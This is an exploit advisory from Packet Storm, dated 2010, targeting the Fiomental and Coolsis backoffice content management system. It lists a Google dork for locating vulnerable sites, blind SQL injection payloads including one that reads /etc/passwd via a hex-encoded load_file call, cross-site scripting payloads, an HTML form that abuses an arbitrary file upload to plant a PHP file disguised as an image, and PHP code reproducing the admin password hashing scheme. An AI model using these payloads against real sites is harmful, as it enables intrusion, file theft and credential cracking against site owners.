Fiomental And Coolsis Backoffice SQL Injection / Cross Site Scripting / Shell Upload

2010-05-10T00:00:00
ID PACKETSTORM:89359
Type packetstorm
Reporter MasterGipy
Modified 2010-05-10T00:00:00

Description

                                        
                                            `  
  
______ _ _ _   
| ___ \ | | | | (_)   
| |_/ /_____ _____ | |_ _| |_ _ ___ _ __   
| // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \   
| |\ \ __/\ V / (_) | | |_| | |_| | (_) | | | |   
\_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|   
  
_____ _____ _____   
|_ _| | _ || _ |  
| | ___ __ _ _ __ ___ | |/' || |_| |  
| |/ _ \/ _` | '_ ` _ \ | /| |\____ |  
| | __/ (_| | | | | | | \ |_/ /.___/ /  
\_/\___|\__,_|_| |_| |_| \___/ \____/  
  
DEFACEMENT it's for script kiddies...  
_____________________________________________________________  
  
[$] Exploit Title : Fiomental & Coolsis Backoffice Multi Vulnerability  
[$] Date : 10-05-2010   
[$] Author : MasterGipy  
[$] Email : mastergipy [at] gmail.com  
[$] Bug : Multi Vulnerability  
[$] Site : http://www.fiomental.com/  
[$] Demo : http://www.fiomental.com/modelo/  
[$] Google Dork : "Desenvolvido por: Fio Mental" or  
"Desenvolvido por: coolsis"  
  
  
[%] vulnerable file: index.php  
  
  
[BLIND SQL INJECTION]  
  
[$] Exploit:  
  
[+] http://example.pt/?cod=1 <- SQL  
[+] sql_1: -1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 and '1'='1  
[+] sql_2: -1' UNION ALL SELECT 1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9,10 and '1'='1  
  
  
  
[XSS]  
  
[+] http://example.pt/index.php/>"><script>alert(/LOL/)</script>  
  
  
  
  
[%] vulnerable file: /admin/index2.php  
  
  
[REMOTE ARBITRARY UPLOAD VULNERABILITY]  
  
[$] Exploit:  
  
<html>  
<form action="http://<-- CHANGE HERE -->/admin/index2.php?sc=up1&ac=a1" method="post" enctype="multipart/form-data" name="form1">  
<p align="center">  
<input name="ficheiro" type="file" class="file" id="ficheiro">   
<input name="ok" type="submit" class="button" id="ok" value="OK">  
</p>  
<p align="center">(only gif png jpg are allowed) </p>  
<p align="center">Files go to:  http://example.pt/uploads/your_file.php.png</p>  
</form>  
</html>  
  
  
[XSS]  
  
[$] http://example.pt/admin/index2.php?&cod=1&ac=a1&tituloSc=<script>alert(/LOL/)</script>  
(you need to login for this one)  
  
  
  
[%] EXTRA:  
  
[$] Admin Panel Password Algorithm   
  
<?php  
$login = "test";  
$pass = "test";  
  
$total = md5(($login . 'fiomental').(md5($pass)));  
// md5($salt.md5($pass)  
echo "$total"; // This will Print the password Hash.  
?>  
  
  
  
[§] Greetings from PORTUGAL ^^  
  
  
  
`